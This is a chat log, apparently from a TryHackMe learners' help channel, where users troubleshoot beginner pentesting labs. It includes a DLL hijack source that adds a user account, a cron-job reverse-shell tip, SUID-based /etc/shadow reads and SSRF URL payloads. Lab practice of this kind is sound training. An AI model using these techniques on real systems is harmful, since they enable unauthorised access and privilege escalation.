ffuf*

check the file you are using. it should be just 1 username per line and no other info

I just had the same problem a day ago, so I edited the original file using "nano"

checked it! 4 names and only the names

can you attach the screenshot?

sure, don't know if it's allowed though!

the file is OK but I want to see the command u r using

as long as you verified it's allowed

maybe you are running the terminal in the wrong directory(it should be the same as the location of you usernames file)?

no it's not that

they were just talking about this problem, check it out, maybe it'll help

Still same issue?

yes, I get no hits!

maybe the users upgraded to more secure pws...

The userlist you have there, did you manually create it or have you just edited the ffuf output file?

i tried both ways but at the moment the list is manually edited by me to only contain the 4 usernames and no other characters.

So manually "created", not the ffuf file just edited and got rid of size, status etc. right?

ahh, no it was created by ffuf and i edited it

Okay, then maybe try to create the file from scratch on your own with the usernames written manually.

Maybe it's a different issue, but would start of with that.

you were right!

Something was wrong with the output file from ffuf! Interesting! The one I created manually works. Thanks! Maybe something worth investigating so that others don't have the same issue in this beginner pentester thing

Do you still have that username wordlist that wasn't working available?

it's on my attackbox still

yep

What's the name of it`?

/root/validusernames.txt is the bad file /root/valid_usernames.txt is the working one

they look the same to me!

Could you run cat /root/validusernames.txt | tr " " "*" | tr "\t" "&" | tr "\n" "#" and post the output?

https://i.imgur.com/Cng4nn4.png Are the strings in read considered anti-virus signatures?

No. Those are just the names that different AV softwares use to refer to specific virus types. The signatures are a strings of code or operations that the file performs that cause the AV to think it's malicous

Oh it seems not to be in /root . Then just run cat validusernames.txt | tr " " "*" | tr "\t" "&" | tr "\n" "#" while being in the folder where that file is located

It produces the same output.

Uhm, okay ? Weird. Well never mind then, maybe tr is not installed or the file name is having a typo in it. But at least it's working now 😄

Yes, thanks 🙂 gtg with the dog now.

Ah right.

Hey all, I was working on Protocols and Servers Task 6 and I am having some issue connecting to the remote host.
Can anyone help me out here?
While trying to connect to the remote machine vie POP3 port I am having this error.
┌──(kali㉿kali)-[~]
└─$ telnet 10.10.5.106 110 1 ⨯
Trying 10.10.5.106...
Connected to 10.10.5.106.
Escape character is '^]'.
+OK Hello there.
Connection closed by foreign host.

Connection closed by foreign host. This means that launching the telnet service failed.

open tryhackme website and check if you are connected to the ovpn, then regenerate the file, and copy the following command.

git clone https://github.com/tryhackme/openvpn-troubleshooting

then run the script sudo ./thm-troubleshoot follow the instructions.

after that I want you to terminate the task VM and try again the telnet task.

Well I think if you are not doing anything within a certain amount of time the connection gets closed. So after you connected, login like explained in the task.

Okay, let me try this out and get back to you.
Thanks for the help

Hello. I'm working on https://tryhackme.com/room/netsecchallenge and I can't seem to get the flag, despite having 0% on the last question of Task 2. Is there something else I must do?

@shadow echo have you used dirtyc0w.c ?

try it a few more times if you have the right command

it should show you the flag

I think I have used it once in a room yes.

as a pop-up or just text on the page?

text on the page afaik

thanks @opal furnace

Gave +1 Rep to @opal furnace

I tried this, no luck, the same error is popping up!!

did you tried using a different port?

POP3 works on port 110 right?
How can I try different port?

no. you are connected

the problem is that you dont specify a user/password

do it with

USER <user>

PASS <password>

Connect to the VM (MACHINE_IP) at the POP3 port. Authenticate using the username frank and password D2xc9CgD. What is the response you get to STAT?
This was the question

yep. do the same thing

telnet ip 110

I am not getting the prompt to enter the username and password, should I add it on a single command?

there is no prompt. think at it as a command

you have to write it like a command

USER frank

PASS D2xc9CgD

That first sentence is completely wrong. There's no telnet service involved whatsoever.

For POP3 check port 110 and if using SSL then check port 995.

Ok got it, thanks for the help.

oh I remember now at first when I did that I also was a little bit confused.

Yeah, it was confusing, in the previous task I got similar problem while getting the flag, so I bypassed it by wget, instead of telnet connection.😅

this was my reference https://unix.stackexchange.com/questions/393959/telnet-connection-had-been-closed-by-a-foreign-host

Doesn't mean it's correct.
It's a very different situation.

I am happy to know more if you are willing to go in depth.

Read what fontaene said

Well I think if you are not doing anything within a certain amount of time the connection gets closed. So after you connected, login like explained in the task.

telnet 10.10.73.154 110
Trying 10.10.73.154...
Connected to 10.10.73.154.
Escape character is '^]'.
+OK Hello there.
USER frank
+OK Password required.
PASS D2xc9CgD
+OK logged in.
Connection closed by foreign host.

Now it's coming up like this

same thing. you havent inserted a command and it logged you off

You're not connecting to a telnet service at all on the task. That's why it's quite clearly not a relavant answer

Sorting useful information from useless information is a skill to learn

I got the username and password, what's next than?

taking notes on that.

give this a quick read https://electrictoolbox.com/pop3-commands/

(also read what the tasks question tells you)

Ok, now I got it, I have been used to connect via ssh so much, telnet was news to me.
Didn't knew how all this worked properly.
Thanks for the help. Solved the questions.

don't forget to join the community, verify your account

Yeah, I was just looking into that, where can I verify my account?

!docs verify

Hi, I'm stuck in the subdomain enumeration task 6. when i run the command given on the web-based kali linux box, i get the ffuf command not found error. how can I proceed?

Show the command and error

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.149.43

error is just the 'bash: ffuf: command not found'

you dont have fuff command installed

apt-get install fuff

how come the web-based kali itself doesn't have ffuf installed? is it just me or does everyone need to go through this hidden step before being able to run the command?

the ffuf problem got solved, thanks 🙂

Because you're expected to use the attackbox

The Attackbox is kept updated and maintained, the kali is not

Ahh I see, okay. Thanks @idle bison !

Gave +1 Rep to @idle bison

I haven't been able to find the winprivesc credentials, like the basic ones.

Check some of the other tasks, the creds will be the same for all machines in that room.

I am actually overwhelmed by bunch of stuff going on and I did check linuxprivesc I didn't try all the possible creds like I have left to try, I also did checked the other sections in winprivesc and didn't find anything.

I am going to finish the nessus room, go for a sprint, practice the linuxprivesc techniques, and try again looking for those creds.

heyy guys i m a student french and i have questions about somes things like usualy, a french pentester with french certification have a chance to found a job in US or Canada ?

I think that's more of a question for #cyber-and-careers or #infosec-general

oh yeah you agree my bad !

i though it was here for ask anythings about junior pentester x)

Hell y'alls, is there a reason to why i am getting only fingerprints but not OS type during a "sudo nmap -O ip" or even "sudo nmap -sS -O ip" for the Nmap post ports scans for Task 3 OS detection? It's doing nothing like the walkthrough.

I know this is supposed to be a simple task but it isn't giving me the OS detect I need to answer the question.

-sV????

Let me try that.

Ugh... that worked... I need to play around more on this and try different commands. Thank you..

Gave +1 Rep to @sage current

no problem

reading the man page for nmap or going through the basics of nmap room will help a lot too

Absolutely... I seem to have gotten into this bad habit of not using it enough, man page, that is. I just need more practice thinking outside the box, and think, like you said, "man page is your best friend."

Sometimes, when one syntax don't work, just have to look deeper into man page... I assumed that -O was enough for OS detection. Just like the pentest exams asking this question asking what option would you use to detect the OS.. it doesn't work in reality until you add -sV... -O alone don't give me the OS at all, instead gives me the fingerprint.

GET , put i did the first one (post request) .. i am at the last one which needs to bypass the filters in use and i tried my payloads and i can't succeed to find a way around /etc/flag3

thanks omerikos, I'm still not getting anywhere. I've tried making my own file with the usernames with one on each line. I tried altering the ffuf output file making sure there were no additional spaces anywhere and just different versions of that. I removed the -fc 200 to see what would happen and I got output but it was alot and I couldn't find any status codes that were not 200. I also doubled check I was in the correct directory running it. I'm sure I'm missing something very obvious.

Gave +1 Rep to @sacred orbit

did you check if you have the file with the passwords?

yes I even opened it to make sure the file had stuff in it...

could you please give me the usernames wordlist so i try fixing the problem on my machine

it will be a few minutes I have to start the attack box

never mind i found it

btw it worked for me

why wouldnt it work for you hm

yo you need to set the status code to -mc 302,301 .. successful login will redirect not give you 200 ok

thank you hassk0dark. I will try it. I did try fc 300 but not 302,301

Gave +1 Rep to @olive magnet

it worked for me without specifying -fc 302,301

fc will filter out all 302 and 301 status codes then, so that's not it.

technically the command should work

@jovial whale you are working on attackbox right? let me try it on there too

sorry i meant -mc 302,301

but it does not need to filter the output it is already a small list

anyone please ?

doing lfi

stuck on flag3

How is your request looking like?

just solved lol .. thanks you make me notice another way ..i thought the way of solving this challenge by manipulating the input and it tends to be simple way

@jovial whale i played a bit with the fuff command. are you 100% positive that you put the right ip address

that seems like the only reason

thank the gods...it worked hass0dark.

Gave +1 Rep to @olive magnet

can you try it without it again? and the command from the web

to test it again

yes.. I just switched out the -fc to -mc 302,301 as hassk0dark suggested and I had success!

nice! but can you also try the first payload that you got without -mc 302,301

luma, very interesting I just re-ran the -fc 200 code and it gave me the answer. I don't understand that because I have doing that for the past week and I got nothing.

yeah i figured that -mc 302,301 wasnt the issue. i honesly have no idea why it didnt work the first time. but its good it works now

the first, second......20th time it didn't work over 7 days.

my advice would be to find the answer and move on if you haven't done it yet

I went to task 5 and did that but it was hard for me to let task 4 go...🙃

Question, not sure the "why" part so, was curious. When running "ssh2-enum-algos" nmap queries in sudo for the attack machine, why does it work on the AttackBox but not while I am in OVPN? The error on my VM ovpn gives me the:
Failed to resolve "–script".
Failed to resolve "“ssh2-enum-algos”".
The script is there on my VM just like Attackbox is for Task 4 on nmap post port scans? I was able to answer all the questions, not sure the "why" is works fine on attackBox but not my VM while ovpn.
Thx

BTW, I can ping the attackbox which is my first step as a rule of thumb to ensure line of communication.

Can you send a screenshot please?

Try nmap --script=ssh2-enum-algos

That worked. May i ask, why it worked this way?

I dont know why -script "ssh2-enum-algos" worked for you on attackbox i've never seen it, but the way to call lua scripts is with --script=

check man nmap for more info

Alrighty... I was curious on the differences ... so weird.... Thanks again! 🙂

Gave +1 Rep to @opal furnace

Strange the man page is the same for both machines, AttackBox and my VM...

Please what’s the difference between enumeration and reconnaissance?

Seems like a good question for google!

@opal furnace Yo if you can answer the question, I’d appreciate if you do , if you don’t 🤐.

Sure bud! 😄

👍

Recon is broken into 2 categories. Passive and Active. Passive doesn't touch anything (attacking target) can be company names, employees which focus on OSINT, whereas active can trigger activity against the attacking machine to pull information like ports, web scan, vuln scan, etc... the enumeration part is where it gets interesting by getting IP, port versions which lets you use many different open source tools like nmap, curl, SET, msfconsole, etc.. too may to list... after gathering all the enumeration you can move to exploitation to gain access and privilege escalation.

hey need help in linux privesc cronjob
i have added revere shell code in backup.sh but i am not getting reverse shell

did you change permissions to that file?

chmod +x backup.sh

no i didnt

let me try

sure, try it, wait for 3-5 mins and let me know if it worked

thanks @opal furnace worked

Gave +1 Rep to @opal furnace

yes

Thank you lonewolf

Gave +1 Rep to @alpine wyvern

👍

Hi

SSRF I understand, very little.
I'm firm with this room, the other rooms fine ... who can give me a hint?

Which SSRF room exactly? there are 2 with the same name

https://tryhackme.com/room/ssrfqi

okay, where are you stuck on?

SSRF Examples😆

you will have passed the url as a parameter ...
but that's not what I don't understand

https://website.thm/item/2?server&x=https://server.website.thm/flag?&id=9

well, you left the ?server parameter empty

you should add &x= at the end

server should be = server.website....

https://website.thm/item/2?server=https://server.website.thm/flag?id=9&x=

😫

that sounds about right

I don't understand and you know it should be a simple room

oh, remove the https:// from the server.website.thm if it didnt work this way @stable stone

what dont you understand exactly?

i recommand reading the tasks again or watching a yt vid about it

yeah, thats the flag

remove it please 😅 since it shouldnt be leaked here

video?

?

SSRF and mysql Injection am only missing these two rooms, I have completed the others

without difficulties

for now thanks.

any luck @modest arch ? i got it compiled and with the correct suid. but the user stayed as karen instead of root.

I think I got it. My mistake. I am running Kali M1 Arm and compiled the C file for ARM. I just compiled again on another Kali x86 VM running on Mac Intel, copied the binary over to the mounted directory and run again.

Fudge. I'm kind of down now knowing this will be a blocker for M1. At least for now.

If anyone could direct me to cross compiling from arm to x86, I would appreciate it.

Anyone around able to help with Task 8 on blind xxs?

what part of the task are you stuck on?

Task 8, trying to get my head around using the tryhackme request catcher.

burp suite?

https://tryhackme.com/room/xssgi

This one.

@modest arch i just dropped you a message

anyone can help with task 5 on Exploit Vulnerabilities?

If you explain what the issue is, then you most probably will get some help.

In metasploit exploitation task 6 I’m getting a 405 when I try to wget (or curl) rev_shell.elf. I’ve tried changing the port of the python3 web server and rebooting the target and attack box. Weird thing is this worked first try last night but I had to stop before setting up the handler and completing the task. Any help would be appreciated!

on the windows privesc room, task 5, how do I get the malicious dll to be loaded by a program? I've read through it a few times and I'm not sure which application is supposed to be exploited.

Have you solved it?

You have to do the exact same as in the task example.

that's where I'm getting stuck --- is the GetSystemDirectory command loading the DLL (under the "If SafeDllSearchMode is enabled, the search order is as follows:") section or am I supposed to be running 7zip?

windows is really a blind spot for me, educationally. trying to wrap my head around this lab.

The DLL will be loaded after you used sc stop dllsvc & sc start dllsvc

I'm getting errors when I use GetSystemDirectory , GetWindowsDirectory, and it's creating files when I run the sc stop dllsvc... commands

I just did thanks! Did /9000 instead of :9000 in my wget lol 🙃

Gave +1 Rep to @shadow echo

my powershell is in the "DLL Hijack Service" directory.

getting the same errors in "Temp"

Am i overlooking something?

You don't have to use GetSystemDirectory or GetWindowsDirectory. First of all, what's the name and the location of the dll file you have created?

it's in C:\Temp\ and it's called...

dllhijackservice.dll

i compiled it on my kali VM with the instructions provided in the lab and used wget to pull it down. That part went smoothly

Okay, the filename is not right. Check the task again for what the name of the file has to be.

thanks. will do

i see.

I'm getting denied when I do the sc stop dllsvc and it's telling me that & is an invalid character when I put the full command

Well tbh I'm not too familiar with PS and windows either. But I was running these commands in CMD.

let me give that a whirl. Thanks for looking into this with me.

Gave +1 Rep to @shadow echo

lol, i'm throwing errors like when I first installed manjaro.

yeah, not sure what I'm doing wrong...

Maybe your dll file is not right.

I would start over again if I'm very stuck and try to follow the steps like in the task.

└─$ cat windows_dll.c                                                                      1 ⨯ │
#include <windows.h>                                                                           │
                                                                                               │
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {                         │
    if (dwReason == DLL_PROCESS_ATTACH) {                                                      │
        system("cmd.exe /k net user jack Password11");                                         │
        ExitProcess(0);                                                                        │
    }                                                                                          │
    return TRUE;                                                                               │
}                                                                                              │
               ```

sorry for the tmux formattnig stuff..

restarting the task.

taking a break. I'll come back to it another time.

I was having problems with this too. I had to reboot the machine and redownload the payload as the service got stuck in a starting phase

couldn't stop the service after having failed once

at a quick glance from my phone your code looks proper

Thanks @weak raven. I'll take a few minutes when I'm with family to keep working on it. They keep asking me what I do. "Cry at labs" doesn't usually seem like a good answer

Gave +1 Rep to @weak raven

Yep, that's it.
Sc is an alias in poweshell.
Sc.exe (explicitly the exe) should? Work

yes it does, as well as net start <service> and net stop <service> etc

I find the error messages from sc can be more intuitive personally

agreed

I'm just an old windows goat

forcing myself to use powershell more

I think you can do it with powershell with Start-Service etc

it's funny, despite having massively more windows experience I still find windows is harder for me to priv esc

or just different, haven't done it as much

I think the documentation is cleaner on Linux privesc

Less bloat and outdated code so the path to privesc is straighter.

How can I see or fetch the response payload using inspect element in firefox, after I changed the type of request from GET to POST?

I know I can easily do that with burp and curl, I think you are able to do it wite firefox also.

I can capture the flag for the RFI File Inclusion Lab #playground challenge but, when I try it over OpenVpn from my localhost I cannot get the flag.......

Hello! My Net Sec challenge last task is broken. I tried a lot of scanning, all works fine, then I always get 0%. I tried to reset the machine but does not work.

I was able to get it finally. It seems like has some problems at that task

I'm doing the What the Shell challenges and it's tasked me with generating a powershell webshell for the windows box, but I'm trying to generate this payload with msfvenom and I cannot get the shell to activate. Any pointers?

For some reason I had issues too... In the end I've done it by using CMD instead PowerShell and the command: sc stop dllsvc & sc start dllsvc

hello guys, may someone kindly please help me in the subdomainenumeration task 6, i have failed to answer the question close to one and a half weeks

Can someone help me with the Cookie tampering task in the auth bypass room? I see that my openVPN is connected but when i run the first command, I am getting an error msg - Failed to connect to <ip> port 80 after 0 ms.

@modest arch @brazen notch could you send some screenshots please

if I don't get the 'failed to connect message', I see this.

Thats because you are trying to CURL your own IP, not the machine's IP. That ip near root@ its your own. To get the machine's ip you have to start it. Search for a green button in the right corner that says "Start Machine" in this task or previous ones

🤦‍♂️ my bad, thanks!

send some screenshots aswell but next time dont spam, it makes us less likely to help you

verify first

!docs verify

Hi trying to use wget to my simplehttpserver but i get the error cannot write to 'file' (permission denied)

on my simplehttpserver i have a 200 code

can you send a screenshot with both terminals please

Ah sure, maybe you dont have privs to create files in the directory

try to wget it into /tmp directory

aah makes sense now

Gave +1 Rep to @opal furnace

thank you @opal furnace !

Linux privilege escalation SUID, any hints on flag3.txt? i have the user accounts dont know where to go from there, tried to add acc to shadow file but have no access

You found a binary with SUID bit set to use?

yes base64

but you can only print with that right? not add a user 2 the shadow file?

You can basically read files, yes. Note, the task is just an example, in case of that example the SUID bit was set for nano, doesn't mean it is set for it on the target machine. So you don't have to follow the steps from that example on the target machine.

@shadow echo I used this but I only can read files with ./base64 /etc/shadow | base64 --decode. i tried other commands but I cant work it out

for example I tried this

And that's correct, you can only read files. But what else do you need for that task?

haha i got it now, thanks 🙂 my brain was too overloaded 😅

Gave +1 Rep to @shadow echo

So, I was able to get a powershell shell only after I got a cmd shell via php. Should I be able to get a powershell shell directly from the php webshell? I’m not at my computer right right now to gather screenshots

just was going to ask after completing complete-beginner and web-fundamentals paths, which should i start first junior pentester or offensive pentester path

you should do pre security and junior pentester, they contain very useful information that you need for offensive path

Thanks you Luma, I will do that

Room linux privesc, privage escalation: cron jobs. Should i use python to get the shell? (instead of bash) because i can make the python file

the * * * * * , does that mean the script needs 2 be executed and there is no time set?

You can just use the .sh files, although you could probably also use the .py file. Regarding the time for the crontab: https://crontab.guru/#*_*_*_*_*

@shadow echo thanks for the crontab link, is very usefull. I wonder if it is possible I broke it? because i used python scripts first which didnt work(with errors). I wont receive shell when i use the /home/karen/backup.sh

Gave +1 Rep to @shadow echo

Check the permissions of that file.

im not allowed to make antivirus file and i tried it also in all the PATH variables to see if i can make a dir of file there but have no permissions. @shadow echo any hints?

You already have the /home/karen/backup.sh so check the permissions of that file, sry if that wasn't clear what I meant with my last message.

ls -al /home/karen/backup.sh

hmm i dont really understand, do i need to change permissions to root?

No, what's the output of ls -al /home/karen/backup.sh post it here pls.

So that file has only rw-r --r permission. So that means that file can not be executed, you have to set the permission to that file.

got it thank you @shadow echo , i thought root was always allowed to execute a file

Gave +1 Rep to @shadow echo

Knowing that Nmap scripts are saved in /usr/share/nmap/scripts on the AttackBox. What does the script http-robots.txt check for?
any help??